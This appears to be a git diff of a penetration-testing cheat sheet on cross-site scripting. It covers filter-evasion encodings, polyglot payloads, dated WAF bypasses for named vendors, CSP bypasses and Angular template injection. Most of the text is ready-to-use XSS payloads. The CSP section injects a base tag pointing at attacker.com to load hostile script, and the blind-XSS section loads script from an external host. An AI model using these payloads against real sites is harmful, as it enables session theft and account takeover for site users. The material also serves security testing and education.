Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote.
Payload: `search=%1b(J&lang=en";alert(1)//`
## Bypass using HTML Encoding
```javascript
@ -456,7 +455,7 @@ javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
More alphabets on [aem1k.com/aurebesh.js](http://aem1k.com/aurebesh.js/)
## Bypass using ECMAScript6
@ -466,7 +465,6 @@ More alphabets on http://aem1k.com/aurebesh.js/#
## Bypass using Octal encoding
```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
@ -489,7 +487,6 @@ It uses Unicode escape sequences to represent characters.
| `\u0072` | r |
| `\u0074` | t |
Same thing with these Unicode characters.
| Unicode (UTF-8 encoded) | Unicode Name | ASCII | ASCII Name |
@ -499,14 +496,12 @@ Same thing with these Unicode characters.
| `\u02BA` (%CA%BA) | MODIFIER LETTER DOUBLE PRIME | " | QUOTATION MARK |
| `\u02B9` (%CA%B9) | MODIFIER LETTER PRIME | ' | APOSTROPHE |
An example payload could be svg onload=alert(/XSS/)/`, which would look like that after being URL encoded:
```javascript
%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
```
When Unicode characters are converted to another case, they might bypass a filter look for specific keywords.
| Unicode | Transform | Character |
@ -523,7 +518,6 @@ The following payloads become valid HTML tags after being converted.
<ıframe id=x onload=>
```
## Bypass using UTF-7
```javascript
@ -571,7 +565,6 @@ Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
## Bypass using JSfuck
Bypass using [jsfuck](http://www.jsfuck.com/)
@ -580,7 +573,6 @@ Bypass using [jsfuck](http://www.jsfuck.com/)
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
```
## References
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)

17
XSS Injection/2 - XSS Polyglot.md
View file

@ -3,26 +3,31 @@
A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work across multiple contexts within a web application, such as HTML, JavaScript, and attributes. It exploits the applications inability to properly sanitize input in different parsing scenarios.
* Polyglot XSS - 0xsobky
```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
* Polyglot XSS - Ashar Javed
```javascript
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
```
* Polyglot XSS - Mathias Karlsson
```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
```
* Polyglot XSS - Rsnake
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
* Polyglot XSS - Daniel Miessler
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
@ -40,19 +45,21 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
```
* Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
* Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
```javascript
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
```javascript
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```
* Polyglot XSS - from [@filedescriptor's Polyglot Challenge](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
```javascript
// Author: crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
@ -68,12 +75,12 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work
```
* Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
```javascript
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
```
## References
- [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/)
- [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
* [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/)
* [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)

24
XSS Injection/3 - XSS Common WAF Bypass.md
View file

@ -1,7 +1,6 @@
# Common WAF Bypass
> WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
> WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
## Summary
@ -12,31 +11,35 @@
* [WordFence WAF](#wordfence-waf)
* [Fortiweb WAF](#fortiweb-waf)
## Cloudflare
* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
```js
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```
* 21st April 2020 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
```js
<svg/OnLoad="`${prompt``}`">
```
* 22nd August 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
```js
<svg/onload=%26nbsp;alert`bohdan`+
```
* 5th June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
```js
1'"><img/src/onerror=.1|alert``>
```
* 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
```js
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
@ -44,11 +47,13 @@
```
* 22nd March 2019 - @RakeshMane10
```js
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
```
* 27th February 2018
```html
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
```
@ -58,46 +63,50 @@
NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
* 9th August 2018
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
## Incapsula WAF
* 11th May 2019 - [@daveysec](https://twitter.com/daveysec/status/1126999990658670593)
```js
<svg onload\r\n=$.globalEval("al"+"ert()");>
```
* 8th March 2018 - [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
* 11th September 2018 - [@c0d3G33k](https://twitter.com/c0d3G33k)
```javascript
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
## Akamai WAF
* 18th June 2018 - [@zseano](https://twitter.com/zseano)
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
* 28th October 2018 - [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480)
```svg
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```
## WordFence WAF
* 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)
```html
<a href=javas&#99;ript:alert(1)>
```
@ -105,6 +114,7 @@ NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and C
## Fortiweb WAF
* 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)
```javascript
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```
```

78
XSS Injection/4 - CSP Bypass.md
View file

@ -2,7 +2,6 @@
> A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.
## Summary
- [CSP Detection](#csp-detection)
@ -17,39 +16,36 @@
- [Labs](#labs)
- [References](#references)
## CSP Detection
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Googles CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
## Bypass CSP using JSONP
**Requirements**:
* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
- CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
**Payload**:
Use a callback function from a whitelisted source listed in the CSP.
* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
* Youtube: `https://www.youtube.com/oembed?callback=alert;`
* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
- Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
- Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
- Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
- Youtube: `https://www.youtube.com/oembed?callback=alert;`
- [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
- [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
## Bypass CSP default-src
**Requirements**:
* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`,
- CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`,
**Payload**:
@ -63,13 +59,11 @@ window.frames[0].document.head.appendChild(script);
Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
## Bypass CSP inline eval
## Bypass CSP inline eval
**Requirements**:
* CSP `inline` or `eval`
- CSP `inline` or `eval`
**Payload**:
@ -79,12 +73,11 @@ d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]
Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
## Bypass CSP script-src self
## Bypass CSP script-src self
**Requirements**:
* CSP like `script-src self`
- CSP like `script-src self`
**Payload**:
@ -94,13 +87,11 @@ Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c2731
Source: [@akita_zen](https://twitter.com/akita_zen)
## Bypass CSP script-src data
**Requirements**:
* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
- CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
**Payload**:
@ -110,12 +101,11 @@ Source: [@akita_zen](https://twitter.com/akita_zen)
Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
## Bypass CSP unsafe-inline
**Requirements**:
* CSP: `script-src https://google.com 'unsafe-inline';`
- CSP: `script-src https://google.com 'unsafe-inline';`
**Payload**:
@ -123,33 +113,32 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
"/><script>alert(1);</script>
```
## Bypass CSP nonce
**Requirements**:
* CSP like `script-src 'nonce-RANDOM_NONCE'`
* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
- CSP like `script-src 'nonce-RANDOM_NONCE'`
- Imported JS file with a relative link: `<script src='/PATH.js'></script>`
**Payload**:
1. Inject a base tag.
- Inject a base tag.
```html
<base href=http://www.attacker.com>
```
2. Host your custom js file at the same path that one of the website's script.
```
- Host your custom js file at the same path that one of the website's script.
```ps1
http://www.attacker.com/PATH.js
```
## Bypass CSP header sent by PHP
**Requirements**:
* CSP sent by PHP `header()` function
- CSP sent by PHP `header()` function
**Payload**:
@ -163,9 +152,8 @@ Here are several ways to generate a warning:
If the **Warning** are configured to be displayed you should get these:
* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
- **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
- **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
```ps1
GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
@ -173,19 +161,17 @@ GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
## Labs
* [Root Me - CSP Bypass - Inline Code](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Inline-code)
* [Root Me - CSP Bypass - Nonce](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce)
* [Root Me - CSP Bypass - Nonce 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce-2)
* [Root Me - CSP Bypass - Dangling Markup](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup)
* [Root Me - CSP Bypass - Dangling Markup 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup-2)
* [Root Me - CSP Bypass - JSONP](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-JSONP)
- [Root Me - CSP Bypass - Inline Code](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Inline-code)
- [Root Me - CSP Bypass - Nonce](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce)
- [Root Me - CSP Bypass - Nonce 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce-2)
- [Root Me - CSP Bypass - Dangling Markup](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup)
- [Root Me - CSP Bypass - Dangling Markup 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup-2)
- [Root Me - CSP Bypass - JSONP](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-JSONP)
## References
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)
- [D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017](http://web.archive.org/web/20170627043828/https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html)
- [Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06](https://www.buaq.net/go-25883.html)

23
XSS Injection/5 - XSS in Angular.md
View file

@ -9,7 +9,6 @@
* [Automatic Sanitization](#automatic-sanitization)
* [References](#references)
## Client Side Template Injection
The following payloads are based on Client Side Template Injection.
@ -205,7 +204,6 @@ AngularJS bypass Waf [Imperva]
}}
```
Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger)
```javascript
@ -304,11 +302,11 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (Po
However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods:
- bypassSecurityTrustHtml
- bypassSecurityTrustScript
- bypassSecurityTrustStyle
- bypassSecurityTrustUrl
- bypassSecurityTrustResourceUrl
* bypassSecurityTrustHtml
* bypassSecurityTrustScript
* bypassSecurityTrustStyle
* bypassSecurityTrustUrl
* bypassSecurityTrustResourceUrl
Example of a component using the unsecure method `bypassSecurityTrustUrl`:
@ -336,11 +334,10 @@ export class App {
When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application.
## References
- [Angular Security - May 16, 2023](https://angular.io/guide/security)
- [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson (@MtnBer) - July 11, 2024](https://matanber.com/blog/4-char-csti)
- [Blind XSS AngularJS Payloads - Lewis Ardern - December 7, 2018](http://web.archive.org/web/20181209041100/https://ardern.io/2018/12/07/angularjs-bxss/)
- [Bypass DomSanitizer - Swarna (@swarnakishore) - August 11, 2017](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
- [XSS without HTML - CSTI with Angular JS - Gareth Heyes (@garethheyes) - January 27, 2016](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
* [Angular Security - May 16, 2023](https://angular.io/guide/security)
* [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson (@MtnBer) - July 11, 2024](https://matanber.com/blog/4-char-csti)
* [Blind XSS AngularJS Payloads - Lewis Ardern - December 7, 2018](http://web.archive.org/web/20181209041100/https://ardern.io/2018/12/07/angularjs-bxss/)
* [Bypass DomSanitizer - Swarna (@swarnakishore) - August 11, 2017](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
* [XSS without HTML - CSTI with Angular JS - Gareth Heyes (@garethheyes) - January 27, 2016](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)

92
XSS Injection/README.md
View file

@ -2,7 +2,6 @@
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
## Summary
- [Methodology](#methodology)
@ -41,27 +40,24 @@
- [Labs](#labs)
- [References](#references)
## Methodology
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
There are 3 main types of XSS attacks:
* **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
- **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
* **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
- **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
* **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.
- **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.
To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.
## Proof of Concept
When exploiting an XSS vulnerability, its more effective to demonstrate a complete exploitation scenario that could lead to account takeover or sensitive data exfiltration. Instead of simply reporting an XSS with an alert payload, aim to capture valuable data, such as payment information, personal identifiable information (PII), session cookies, or credentials.
### Data Grabber
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
@ -126,7 +122,6 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
## Identify an XSS Endpoint
This payload opens the debugger in the developer console rather than triggering a popup alert box.
@ -163,15 +158,15 @@ References:
- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
- [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/)
### Tools
### Tools
Most tools are also suitable for blind XSS attacks:
* [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained
* [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities
* [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go
* [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby
* [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester
- [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained
- [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities
- [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go
- [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby
- [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester
## XSS in HTML/Applications
@ -256,7 +251,9 @@ e.g: 14.rs/#alert(document.domain)
<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event
```
in newer browsers : firefox-130/chrome-108
```javascript
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto" >
```
@ -386,8 +383,6 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc
</svg>
```
#### Short SVG Payload
```javascript
@ -496,12 +491,12 @@ document.getElementById('btn').onclick = function(e){
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
You can set up an alternative version
You can set up an alternative version
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
- Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
- Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
```xml
"><script src="https://js.rip/<custom.name>"></script>
@ -512,25 +507,25 @@ You can set up an alternative version
### Other Blind XSS tools
- [Netflix-Skunkworks/sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework
- [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
- [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
- [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
- [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
### Blind XSS endpoint
- Contact forms
- Ticket support
- Referer Header
- Custom Site Analytics
- Administrative Panel logs
- Custom Site Analytics
- Administrative Panel logs
- User Agent
- Custom Site Analytics
- Administrative Panel logs
- Custom Site Analytics
- Administrative Panel logs
- Comment Box
- Administrative Panel
- Administrative Panel
### Tips
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
Eg. payload
@ -541,41 +536,34 @@ Eg. payload
Eg. one-line HTTP server:
